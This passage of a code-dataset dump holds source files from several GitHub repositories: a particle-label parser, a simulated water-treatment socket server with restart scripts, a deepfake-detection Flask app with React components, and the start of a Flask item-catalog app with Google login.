false, "language": "Python", "length_bytes": 1101, "license_type": "no_license", "max_line_length": 47, "num_lines": 40, "path": "/image_processing/label_stats.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom ast import literal_eval\nimport shutil\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n labels = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n if 'Weird Data' == txt[0]:\n weird = 'Not Weird Data'\n start = 2\n elif 'Weird Data' == txt[0]:\n weird = 'Weird Data'\n start = 2\n else:\n weird = 'No W Labeled'\n start = 1\n start = txt.index('Particle Location:') + 1\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n label_stop = txt.index('Image Size:')\n for loc in txt[start:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n for loc in txt[radius_stop+1:label_stop] :\n labels.append(loc)\n image_size = literal_eval(txt[-1])\n return centers, radii, labels, weird\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 34, "blob_id": "9f1eeb60898139332507bb40e59762eaf1d915cd", "content_id": "9d53fa1379073f1e9880df1920211a00a5035056", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/label_data_gui/README.md", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# README For Particle Labeling GUI\n" } ]
24
Ragnok/residential
https://github.com/Ragnok/residential
1023b29436cbd0f704af58eda160c60ad5474716
313282a837512cbec3a18e35ad9915d7f0ee5a26
fa0990efd9ed91e07c0cd66b281c0c77c7039d1a
refs/heads/master
2016-09-23T01:59:28.219222
2016-07-29T15:41:10
2016-07-29T15:41:10
63,088,258
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5808066725730896, "alphanum_fraction": 0.5926432013511658, "avg_line_length": 33.86666488647461, "blob_id": "8eebb48f30b5c6b739689b5360668e41dc564925", "content_id": "a18c82576aedec2ae21e45a0d7acd44023a3c560", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10983, "license_type": "no_license", "max_line_length": 169, "num_lines": 315, "path": "/ol_res.py", "repo_name": "Ragnok/residential", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\nimport struct\nimport selectors\nimport socket\nimport sys\nfrom header import Header\nfrom liquid import Liquid\n\nWTR_DROP_SZ = 8\nPKT_HDR_SZ = 8\nPKT_TYPE_WATER = 0\nPKT_TYPE_TRASH = 1\nPKT_TYPE_SLUDGE = 2\nPKT_TYPE_HZMT = 4\nPKT_TYPE_RPRT = 8\nCOMPACTED_DROP = 0xFFFF\n#Error Type\n#reporting format\n#process header\n#process water\n#send report\n#class process\n\n#Trash? have to parse entire packet if trash is found send to 2222\n#No Trash\n#Heavy Metal? - Mercury Selenium convert circlarly linked list to single linked list extract largest value node and make null anything that points to extracted node 8888\n#rest of payload\n#biological wasters - undulating data and prime number data removed offending molecules script sludge 4444 all nodes pointing to removed nodes zeroed out\n#rest of payload\n#Chemical Treatments - nothing removed\n#water payload sent to 1111\n\n#shore up output connect so we dont lose data\n#need to remove droplet should remove the droplet from the packet of droplets\n#add a new fn that airify dropslets (what droplet currently is doing)\n#trash\n\nclass Output:\n def __init__(self):\n self._queue = []\n\n def add(self, server, port, data):\n self._queue.append((server, port, data))\n\n def get(self):\n return self._queue.pop(0)\n\n def num_items(self):\n return len(self._queue)\n\n\nclass Client:\n def __init__(self, socket, address):\n self._socket = socket\n self._address = address\n self.clear_data()\n\n is_output = False\n finished = False # helper attribute so parsers can set a 'disconnect' flag\n\n def clear_data(self):\n self._data = bytes('',\"utf-8\")\n\n def socket(self):\n return self._socket\n\n def ip(self):\n return self._address[0]\n\n def port(self):\n return self._address[1]\n\n def data(self):\n return self._data\n\n def add_data(self, data):# when read from the socket, add the data to here\n self._data += data\n\n def remove_packet(self, size):# removes size bytes from start of data stream\n self._data = self._data[size:]\n\nclass Water:\n def __init__(self):\n self._droplets = [None]#start tuple\n\n def remove_droplet(self, idx):\n if self._droplets==None:\n return\n self._droplets[idx] = (0,0,0)\n\n def generate_packet(self, pkt_type=PKT_TYPE_WATER, custom=0):#can add argument or use custom 0\n size = PKT_HDR_SZ + (self.num_droplets() * WTR_DROP_SZ )\n packet = struct.pack(\"!HHI\", pkt_type, size, custom)\n for drop in range(1, self.num_droplets()+1):\n (data, left, right) = self.get_droplet(drop)\n packet += struct.pack(\"!IHH\", data, left, right)\n return packet\n\n def add_droplet(self, data, left, right):\n self._droplets.append((data, left, right))\n\n def _set_droplet(self, idx, data, left, right):\n self._droplets[idx] = (data, left, right)\n\n def num_droplets(self):#have to subtract 1 as dummy in place\n return len(self._droplets)-1\n\n def get_droplet(self, idx):#can use idx\n if idx > self.num_droplets():\n return None\n return self._droplets[idx]\n\n def has_trash(self):\n max_idx = self.num_droplets()\n for idx in range(1, max_idx+1):\n droplet = self.get_droplet(idx)\n if droplet[1] > max_idx or droplet[2] > max_idx:\n return True\n return False#no trash\n\n def compact_trash(self):\n print(\"Warning need to implement Water.compact_trash\")\n max_idx = self.num_droplets()\n for idx in range(1, max_idx+1):\n droplet = self.get_droplet(idx)\n if droplet[1] > max_idx or droplet[2] > max_idx:\n self._set_droplet(idx, droplet[0], COMPACTED_DROP, COMPACTED_DROP)\n\n def get_feces_index(self):\n #if data is a prime number remove and send to sludge\n max_idx = self.num_droplets()\n for idx in range(1, max_idx+1):\n droplet = self.get_droplet(idx)\n if is_prime(droplet[0]):\n return idx\n return None\n\n def clean_feces(self):\n # if data is a prime number remove and send to sludge\n max_idx = self.num_droplets()\n for idx in range(1, max_idx+1):\n droplet = self.get_droplet(idx)\n if is_prime(droplet[0]):\n #TODO send to sludgify this droplet[0]\n print(\"Sending this turd to sludgify #\", droplet[0])\n self.remove_droplet(idx)\n\n\n\n\"\"\"\n def analyze() // called when finished adding drops (or any of the is_* below)\n def remove_ammonia // returns ammonia and removes from water\n def remove_debris() // returns all trash and removes from water\n def remove_feces() // returns all feces and removes from water\n def remove_mercury // returns all mercury and removes from water\n def remove_selenium // returns all selenium and removes from water\n\n def make_chlorine() // maybe want to set an amount of droplets to convert.. start with all\n def treat_chlorine() // convert chlorine to clean water\n def treat_phosphates() // convert phosphates to clean water\n\"\"\"\n\ndef is_prime(num):\n if num==2 or num==3:\n return True\n if num%2==0 or num<2:\n return False\n for i in range(3,int(num**0.5)+1,2):\n if num%i==0:\n return False\n return True\n\ndef process_client(client):\n data = client.data()\n if len(data) < PKT_HDR_SZ:\n #Not enough Data to Process Header\n return False\n pkttype, size, custom = struct.unpack('!HHI', data[0:PKT_HDR_SZ])\n if len(data) < size:\n #Not enough Data waiting\n return False\n if size <= PKT_HDR_SZ: # must have payload\n send_report(\"Not enough Data\")\n return False\n #we haver a full packet\n #TODO dictionary passing client hdr_size, size\n #process_water(client, 8)\n #data = client.get_data[8:]\n if pkttype == PKT_TYPE_WATER:\n print(\"Found Water Packet\")\n return process_water(client, PKT_HDR_SZ, size)\n# return process_water(data[PKT_HDR_SZ:size], custom)#dont pass header\n elif pkttype == PKT_TYPE_TRASH:\n print(\"Found Trash Packet.. forwarding to downstream\")\n output.add(\"10.0.45.151\", 2222, data[:size])\n #TODO Report?\n return True\n elif pkttype == PKT_TYPE_SLUDGE:\n print(\"Found Sludge Packet\")\n return True\n elif pkttype == PKT_TYPE_HZMT:\n print(\"Found Hazmat Packet\")\n return True\n elif pkttype == PKT_TYPE_RPRT:\n print(\"Found Reporting Packet\")\n return True\n else:\n print(\"Unknown packet found\")\n\ndef process_water(client, hdr_size, size):\n payload = client.data()[hdr_size:]\n if len(payload) % 8 != 0:\n send_report(\"Error: Bad water payload size\")\n return False\n #create water instance\n water = Water()\n print(\"Processing %d droplets\" %(len(payload)/8))\n while payload:\n data, left_i, right_i = struct.unpack('!IHH', payload[0:8])\n print (\" Recieved Water droplet:%x left:%d right:%d\"% (data, left_i, right_i))\n water.add_droplet(data, left_i, right_i)#add droplets to our water instance\n payload = payload[8:]#loop thru droplets in the packet\n print(\"Number of Droplets: \", water.num_droplets())\n if water.has_trash():\n print(\"Trash Found.. sending all droplets to downstream\")\n water.compact_trash()\n output.add(\"10.0.45.151\", 2222, water.generate_packet(PKT_TYPE_TRASH))\n client.remove_packet(size)\n return True\n\n print(\"Sending droplets pretreat\")\n output.add(\"10.0.45.235\", 1111, water.generate_packet())\n client.remove_packet(size)\n return True\n\ndef send_report(msg):\n print(\"Sending report:\", msg)\n\noutput = Output()\n\ndef main():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"server socket\", server.fileno())\n\n # server.setsockopt(socket.SO_SOCKET, socket.SO_REUSADDR, 1)\n # Bind the socket to the port\n server_address = ('localhost', 1111)\n #print >>sys.stderr, 'starting up on %s port %s' % server_address\n server.bind(server_address)\n server.setblocking(False)\n\n # Listen for incoming connections\n server.listen(100)\n\n sel = selectors.DefaultSelector()\n sel.register(server.fileno(), selectors.EVENT_READ)\n finished = False\n while finished != True:\n try:\n while output.num_items():#\n (address, port, packet)=output.get()\n print (\"Sending Data to: %s:%d '%s'\"% (address, port, packet))\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print (\"output socket\", sock.fileno())\n sock.setblocking(False)\n new_client = Client(sock, (address, port))\n new_client.is_output = True\n new_client.add_data(packet)\n sel.register(sock.fileno(), selectors.EVENT_WRITE, new_client)\n events = sel.select()\n for key, mask in events:\n if (key.fileobj == server.fileno()):\n (clientsocket, address) = server.accept()\n print(\"client socket\", clientsocket.fileno())\n clientsocket.setblocking(False)\n print(\"New Connection on Server from \", address)\n print(\"Clientsocket from \", clientsocket)\n new_client = Client(clientsocket, address)\n sel.register(clientsocket.fileno(), selectors.EVENT_READ, new_client)\n continue\n client = key.data\n sock = client.socket()\n if client.is_output:\n print(\"Ready to Connect: %s %d\" %(client.ip(), client.port()))\n res = sock.connect_ex((client.ip(), client.port()))\n if res == 0:\n print(\"Connect OK\")\n sock.send(client.data())\n elif res == 115:#EINPROGRESS\n continue\n else:\n print(\"Error connecting\", res)\n print(\"Closing Output Socket\")\n sel.unregister(key.fileobj)#sel select queue\n sock.close()\n continue\n data = sock.recv(0x10000)\n if not data:\n print (\"Disconnecting client\", sock)\n sel.unregister(key.fileobj)\n # sock.shutdown(1)\n sock.close()\n continue\n #filter poo\n #send water to treatment\n print(\"activity on %d\"% sock.fileno())\n print(\"read data \", data)\n client.add_data(data)\n process_client(client)\n except KeyboardInterrupt:\n print(\"\\nCRTL-C Detected: Quitting\")\n finished = True\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6357616186141968, "alphanum_fraction": 0.6423841118812561, "avg_line_length": 17.875, "blob_id": "ed2c6fe32123f8a740d5f7fa1be79f44db32cf5f", "content_id": "66197f97be3c4772a5ebe4bae0cb2b3b3dcf450d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 151, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/restart.sh", "repo_name": "Ragnok/residential", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nps auxw | grep /root/residential/residential.py | grep -v grep > /dev/null\n\nif [ $? != 0 ]\nthen \n\t/root/residential/start.sh > /dev/null\nfi\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 59, "blob_id": "01f56614a72a21b3806bce21a39484e28dbcfbc7", "content_id": "985114044deb79aa6702350a2fdf593632187efa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "no_license", "max_line_length": 59, "num_lines": 1, "path": "/start.sh", "repo_name": "Ragnok/residential", "src_encoding": "UTF-8", "text": "nohup /root/residential/residential.py >> output.log 2>&1 &\n" } ]
3
pixzel/is105
https://github.com/pixzel/is105
c4d6601b403f7e315107bc02ec01452762fb4404
8a7bf39f7c1901b8cce622237121a0eeec0f4995
c77430b3cb6bd826ae1656f742889036fd045175
refs/heads/master
2020-06-09T03:15:49.327255
2014-02-06T14:26:10
2014-02-06T14:26:10
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5933884382247925, "alphanum_fraction": 0.6644628047943115, "avg_line_length": 20.64285659790039, "blob_id": "f0e009bb6a0d7226fe2b92a3e7ff7408a88a3574", "content_id": "707bf32efe0ceb6201d8e84acb689231fa8c757e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "no_license", "max_line_length": 44, "num_lines": 28, "path": "/lab/python/exercises/ex3.py", "repo_name": "pixzel/is105", "src_encoding": "UTF-8", "text": "#printer ut tekst med: print\nprint \"I will now count my chickens:\"\n\n#her bruker vi plus og slash\nprint \"hens\", 25+30/6\n#Bruker minus, asterisk og percent\nprint \"Roosters\", 100-25*3%4\n\nprint \"Now I will count the eggs:\"\n\nprint 3+2+1-5+4%2-1/4+6\n\nprint \"Is it true that 3 + 2 < 5 - 7?\"\n\n#bruker plus, less-than og minus\nprint 3+2<5-7\n\nprint \"what is 3 + 2?\", 3+2\nprint \"what is 5-7?\", 5-7\n\nprint \"Oh, that's why it's false.\"\n\nprint \"How about some more.\"\n\n#Bruker less-than-equal, greater-than-equal.\nprint \"Is it greater?\", 5>-2\nprint \"Is it greater or equal?\", 5>= -2\nprint \"Is it less or equal?\", 5 <= -2" }, { "alpha_fraction": 0.6588419675827026, "alphanum_fraction": 0.6651017069816589, "avg_line_length": 21.85714340209961, "blob_id": "bcca6420fa8b6eace05224250d3fa8ff88845d14", "content_id": "c35c90d43ecb9c3839d500097b1a5aa229822e74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 640, "license_type": "no_license", "max_line_length": 60, "num_lines": 28, "path": "/lab/python/exercises/ex6.py", "repo_name": "pixzel/is105", "src_encoding": "WINDOWS-1252", "text": "#Dette er en x verdi der %=10 personer.(%d for decimal)\nx= \"there are %d types of people.\" %10\n#Verdier\nbinary = \"binary\"\ndo_not = \"don't\"\n#bruker en verdi y der %=s er binary go (%s for string)\ny = \"Those who know %s and those who %s.\" % (binary, do_not)\n\n#skriver ut verdi x og y\nprint x\nprint y\n\n#skriver ut %r og %x\nprint \"I said %r.\" % x\nprint \"I also said: '%s'.\" %y\n\n\n#Her setter man %r verdien til å hete \"Hilarious\"\nhilarious = False\njoke_evaluation = \"Isn't that joke so funny?! %r\"\n\nprint joke_evaluation % hilarious\n\n#Ganske forklarende i teksten\nw = \"This is the left side of...\"\ne = \"a string with a right side.\"\n\nprint w + e" } ]
2
bdixon300/deepfake-detector-mvp-deployment
https://github.com/bdixon300/deepfake-detector-mvp-deployment
0200f9a1cfd0b24213ce741adcae9de566e001a6
4e922d085f41de9bc963df7b24845f5d5b42c3a4
c010bb695f9ff0ef240df1fc4672906d20ea7278
refs/heads/master
2022-10-23T02:53:59.578137
2020-06-19T11:20:35
2020-06-19T11:20:35
261,473,403
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6290801167488098, "alphanum_fraction": 0.6290801167488098, "avg_line_length": 21.46666717529297, "blob_id": "a46be93e1a3797bb16446947627bab665891a4b9", "content_id": "4b4292bd5e896c497f7fe5c7a3a14721e670652d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 337, "license_type": "no_license", "max_line_length": 106, "num_lines": 15, "path": "/mvp-frontend/src/ResultsComponent.js", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport './App.css';\n\nclass ResultsComponent extends React.Component {\n render() {\n return (\n <div className=\"App\">\n <br></br>\n <br></br>\n {this.props.displayAnalysisResults ? ((<p>This video is: {this.props.analysisResult}</p>) ) : (null)}\n </div>\n );}\n}\n\nexport default ResultsComponent;\n" }, { "alpha_fraction": 0.5862595438957214, "alphanum_fraction": 0.5969465374946594, "avg_line_length": 28.772727966308594, "blob_id": "d2f914ccb8866887ebcd3754eafd271d6b1ac065", "content_id": "f48c86a21ec75936e743868196ba2dc0a813d53f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 655, "license_type": "no_license", "max_line_length": 147, "num_lines": 22, "path": "/mvp-frontend/src/AnalysisComponent.js", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport './App.css';\nimport ProgressBar from 'react-bootstrap/ProgressBar';\n\nclass AnalysisComponent extends React.Component {\n render() {\n return (\n <div className=\"App\">\n {this.props.analysingVideo ? ((\n <div>\n <br></br>\n <p>Processing Video ... Current Probability of being real: {this.props.currentProbability}%</p>\n <ProgressBar animated now={this.props.analysisProgress} label={`${(Math.round((this.props.analysisProgress / 35) * 100))}%`} max={35}/>\n <br></br>\n </div>\n )) \n : (null)}\n </div>\n );}\n}\n\nexport default AnalysisComponent;\n" }, { "alpha_fraction": 0.4497487545013428, "alphanum_fraction": 0.6783919334411621, "avg_line_length": 14.920000076293945, "blob_id": "ec389bf5cec454ecd94fd2a3e095231264dd1954", "content_id": "5e9a60460a00287e3709d5db1d4ebf1fd89e3e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 398, "license_type": "no_license", "max_line_length": 23, "num_lines": 25, "path": "/requirements.txt", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "click==7.1.2\ncmake==3.16.3\ncycler==0.10.0\ndlib==19.19.0\nFlask==1.1.2\nimutils==0.5.3\nitsdangerous==1.1.0\nJinja2==2.11.2\nkiwisolver==1.2.0\nMarkupSafe==1.1.1\nmatplotlib==3.2.1\nnumpy==1.18.1\nopencv-python==4.2.0.32\npafy==0.5.5\npandas==1.0.0\nPillow==7.0.0\npyparsing==2.4.7\npython-dateutil==2.8.1\npytz==2019.3\nsix==1.14.0\ntorch==1.4.0\ntorchvision==0.5.0\ntqdm==4.42.1\nWerkzeug==1.0.1\nyoutube-dl==2020.5.3\n" }, { "alpha_fraction": 0.5528544783592224, "alphanum_fraction": 0.5741844177246094, "avg_line_length": 33.10160446166992, "blob_id": "6732143db004bc07629ae7daa20698cf142e2f23", "content_id": "7a12e366a0cec8b10f093fb02a37dfe56c95de8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6376, "license_type": "no_license", "max_line_length": 122, "num_lines": 187, "path": "/app.py", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "import flask\nimport dlib\nimport cv2\nimport pafy\nimport pandas as pd\nimport os\nfrom PIL import Image\nfrom imutils import face_utils, resize\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.models as models\nimport torchvision.transforms as transforms\n\n# 2D CNN encoder using pretrained VGG16 (input is sequence of images)\nclass VGGCNN(nn.Module):\n def __init__(self, fc_hidden1=512, fc_hidden2=512, drop_p=0.3, CNN_embed_dim=25088):\n \"\"\"Load the pretrained vgg 16 and replace top fc layer.\"\"\"\n super(VGGCNN, self).__init__()\n\n self.fc_hidden1, self.fc_hidden2 = fc_hidden1, fc_hidden2\n self.drop_p = drop_p\n\n vgg = models.vgg16(pretrained=True)\n # delete the last fc layer.\n modules = list(vgg.children())[:-1]\n self.vgg = nn.Sequential(*modules)\n \n def forward(self, x_3d):\n cnn_embed_seq = []\n for t in range(x_3d.size(1)):\n # VGG CNN\n with torch.no_grad():\n # VGG feature extraction\n x = self.vgg(x_3d[:, t, :, :, :])\n # flatten output of conv\n x = x.view(x.size(0), -1)\n cnn_embed_seq.append(x)\n\n # swap time and sample dim such that (sample dim, time dim, CNN latent dim)\n cnn_embed_seq = torch.stack(cnn_embed_seq, dim=0).transpose_(0, 1)\n # cnn_embed_seq: shape=(batch, time_step, input_size)\n\n return cnn_embed_seq\n\n\nclass LSTM(nn.Module):\n def __init__(self, CNN_embed_dim=25088, h_RNN_layers=3, h_RNN=256, h_FC_dim=128, drop_p=0.5, num_classes=2):\n super(LSTM, self).__init__()\n\n self.RNN_input_size = CNN_embed_dim\n # RNN hidden layers\n self.h_RNN_layers = h_RNN_layers\n # RNN hidden nodes\n self.h_RNN = h_RNN\n self.h_FC_dim = h_FC_dim\n self.drop_p = drop_p\n self.num_classes = num_classes\n\n self.LSTM = nn.LSTM(\n input_size=self.RNN_input_size,\n hidden_size=self.h_RNN, \n num_layers=h_RNN_layers, \n batch_first=True, # input & output will has batch size as 1s dimension. e.g. (batch, time_step, input_size)\n )\n\n self.fc1 = nn.Linear(self.h_RNN, 128)\n self.bn1 = nn.BatchNorm1d(self.h_FC_dim, momentum=0.01)\n self.fc2 = nn.Linear(self.h_FC_dim, 64)\n self.bn2 = nn.BatchNorm1d(64, momentum=0.01)\n self.fc3 = nn.Linear(64, self.num_classes)\n\n def forward(self, x_RNN):\n \n self.LSTM.flatten_parameters()\n RNN_out, (h_n, h_c) = self.LSTM(x_RNN, None) \n \n x = self.bn1(self.fc1(RNN_out[:, -1, :])) # Use value at last time step in sequence\n x = F.relu(x)\n x = F.dropout(x, p=self.drop_p, training=self.training)\n x = self.bn2(self.fc2(x))\n x = F.relu(x)\n x = F.dropout(x, p=self.drop_p, training=self.training)\n x = self.fc3(x)\n x = torch.sigmoid(x)\n\n\n return x\n\n# load detection model parameters\ncnn = VGGCNN()\ncnn.cuda()\ncnn.load_state_dict(torch.load('./model/full_data_cnnmodel_for_lstm_2.pth'), strict=False)\ncnn.eval()\nlstm = LSTM()\nlstm.load_state_dict(torch.load('./model/extended_lstm_architecture_cnn_lstm_epoch_3.pth'))\nlstm.cuda()\nlstm.eval()\n\n# Setup mouth extractor\np = \"..\\mouth-extraction-preprocessing\\shape_predictor_68_face_landmarks.dat\"\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(p)\n\n\napp = flask.Flask(__name__, template_folder='templates')\n\ndef analyse_video(filename):\n # Setup reading video\n vidcap = cv2.VideoCapture(filename)\n success = True\n frame_count = 1\n voter_tally = 0\n X = []\n print(\"Evaluating: {}\".format(filename))\n while success and frame_count < 720:\n success,image = vidcap.read()\n if not success:\n break\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n faces = detector(gray, 0)\n largest_face_size = 0\n\n if len(faces) == 0:\n continue\n\n for (i, face) in enumerate(faces):\n # Make the prediction and transfom it to numpy array\n #face = face.rect\n shape = predictor(gray, face)\n shape = face_utils.shape_to_np(shape)\n size = face.width() * face.height()\n if largest_face_size < size:\n largest_face_size = size\n\n # Mouth region uses these indices for dlib\n (i, j) = (48, 68)\n # clone the original image so we can draw on it, then\n # display the name of the face part on the image\n clone = image.copy()\n\n # loop over the subset of facial landmarks, drawing the\n # specific face part\n for (x, y) in shape[i:j]:\n cv2.circle(clone, (x, y), 1, (0, 0, 255), -1)\n (x, y, w, h) = cv2.boundingRect(np.array([shape[i:j]]))\n roi = image[y:y + h, x:x + w]\n roi = cv2.resize(roi, (224,224))\n X.append(transforms.ToTensor()(roi))\n\n if frame_count % 20 == 0:\n X = torch.stack(X, dim=0)\n X = X.unsqueeze(0)\n outputs = lstm(cnn(X.cuda()))\n _, predicted = torch.max(outputs.data, 1)\n voter_tally += predicted.sum()\n X = []\n print(\"current voter talley: {}, current frame sequences processed: {}\".format(voter_tally, frame_count / 20))\n current_probability = (voter_tally.item() / (frame_count / 20)) * 100\n yield str(round(current_probability, 2))\n frame_count += 1\n print(frame_count)\n print(\"voter talley: {}\".format(voter_tally))\n if voter_tally < (frame_count / 20) / 2:\n print(\"fake: video: {}\".format(filename))\n yield \"Fake\"\n else:\n #real_vids += 1\n print(\"real: video: {}\".format(filename))\n yield \"Real\"\n\[email protected]('/', methods=['GET'])\ndef main():\n if flask.request.method == 'GET':\n return(flask.render_template('main.html'))\n\[email protected]('/detect', methods=['POST'])\ndef detect():\n url = flask.request.json['url']\n filename = pafy.new(url).getbest().url\n return flask.Response(flask.stream_with_context(analyse_video(filename)), mimetype='text/event-stream')\n\n\nif __name__ == '__main__':\n app.run()" }, { "alpha_fraction": 0.800561785697937, "alphanum_fraction": 0.800561785697937, "avg_line_length": 88, "blob_id": "a29c7467df2c40458adf27e05d6419fe1cf5d485", "content_id": "fe142faef46dfbe1e38e8aba9d599335cc41235b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 356, "license_type": "no_license", "max_line_length": 124, "num_lines": 4, "path": "/README.md", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "# deepfake-detector-deployment-backend\nMVP demo for Deepfake detection model. Run frontend with \"npm start\" from the react app directory. \nRun backend using \"flask run\" in the top directory. The react app will take any YouTube video input, no other URL will work.\nThis demo was designed for collecting user feedback so it could be improved for production.\n" } ]
5
bradleyGamiMarques/ItemCatalog
https://github.com/bradleyGamiMarques/ItemCatalog
86ea2fcc6b4a4d3c513e84a0995c15c89b31c002
51858555bec5f17ddebf5de1217aa0a917f8f0c2
38889d9803467381482b9ad6c2906bc920a1f19e
refs/heads/master
2020-03-21T08:05:36.320135
2018-06-22T17:13:32
2018-06-22T17:13:32
138,319,712
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7570533156394958, "alphanum_fraction": 0.7742946743965149, "avg_line_length": 30.875, "blob_id": "0d9663e5fc0119113b56f5addc15df991905b65a", "content_id": "f6b5d2c07b681078efd053dd53b801a6ec644f33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1276, "license_type": "no_license", "max_line_length": 149, "num_lines": 40, "path": "/README.md", "repo_name": "bradleyGamiMarques/ItemCatalog", "src_encoding": "UTF-8", "text": "# ItemCatalog\nUdacity Item Catalog project\n\n\n# Description\n\nThe item catalog project has students build an application from the ground up. This is my solution to the project.\n\n## Getting Started:\n\nTo get started with this project you will need to have a couple of files.\n\n* A Unix style terminal. Windows users, I prefer Git Bash. Mac users your regular terminal will be fine.\n* The tools Vagrant and VirtualBox\n* The virtual machine files: https://s3.amazonaws.com/video.udacity-data.com/topher/2018/April/5acfbfa3_fsnd-virtual-machine/fsnd-virtual-machine.zip\n\n\n## Starting up the virtual machine\n\n1. Install the version of [VirtualBox](https://www.virtualbox.org/wiki/Download_Old_Builds_5_1) for your operating system.\n _Windows users may have to disable Hyper-V_\n\n2. Install [Vagrant](https://www.vagrantup.com)\n\n3. cd into the directory with the virtual machine files then cd into the /vagrant directory\n\n4. Use the command vagrant up to start the virtual machine.\n\n5. Once that is complete use the command vagrant ssh to log into your virtual machine.\n\n\n## Using this code\n\n1. cd into the catalog directory.\n\n2. Run the application.py file from the command line. python application.py\n\n3. Navigate to localhost:8000 in a browser.\n\n4. Application will be running here.\n\n" }, { "alpha_fraction": 0.6454988718032837, "alphanum_fraction": 0.6493343114852905, "avg_line_length": 36.09552764892578, "blob_id": "65bcba182a9e30ba97fcd2ba435d2c7579504c44", "content_id": "29c34854599bb3f4a3349fa33edbaf7289ca3bdc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18251, "license_type": "no_license", "max_line_length": 137, "num_lines": 492, "path": "/catalog/application.py", "repo_name": "bradleyGamiMarques/ItemCatalog", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, redirect, jsonify, url_for, flash\nfrom sqlalchemy import create_engine, asc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Category, CategoryItem, User\nfrom flask import session as login_session\nimport random\nimport string\n\n# IMPORTS FOR THIS STEP\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\n\napp = Flask(__name__)\n# Read our client id that was downloaded from our Google API\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\n\n# Connect to the database\nengine = create_engine('sqlite:///catalog.db',\n connect_args={'check_same_thread': False})\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\[email protected]('/login')\ndef showLogin():\n \"\"\"This function renders the login.html page.\"\"\"\n # Create a state variable to prevent cross site scripting attacks.\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in xrange(32))\n login_session['state'] = state\n # return \"The current session state is %s\" % login_session['state']\n return render_template('login.html', STATE=state)\n\n# Begin JSON API Endpoint Functions.\n\n\[email protected]('/category/<int:category_id>/items/JSON')\ndef categoryItems(category_id):\n \"\"\"This function displays all of the items in a category in JSON format.\n\n Keyword arguments:\n category_id(int) An numeric id for identifying a category in the database.\n \"\"\"\n items = session.query(CategoryItem).filter_by(\n category_id=category_id).all()\n return jsonify(category_items=[i.serialize for i in items])\n\n\[email protected]('/category/JSON')\ndef categoriesJSON():\n \"\"\"This function displays all of the categories in JSON format.\"\"\"\n categories = session.query(Category).all()\n return jsonify(categories=[c.serialize for c in categories])\n\n\[email protected]('/catalog/JSON')\ndef show_catalog():\n \"\"\"This function shows all of the categories and items in the database\n in JSON format.\"\"\"\n categories = session.query(Category).all()\n items = session.query(CategoryItem).all()\n return jsonify(\n categories=[\n c.serialize for c in categories], category_items=[\n i.serialize for i in items])\n\n\n# End JSON API Endpoint Functions.\n\[email protected]('/')\[email protected]('/catalog')\ndef main_page():\n \"\"\"Renders the home page of the application.\"\"\"\n # Query the database for all of its data.\n categories = session.query(Category).all()\n items = session.query(CategoryItem).all()\n # Check to see if the user is logged in.\n # If the user is not logged in they 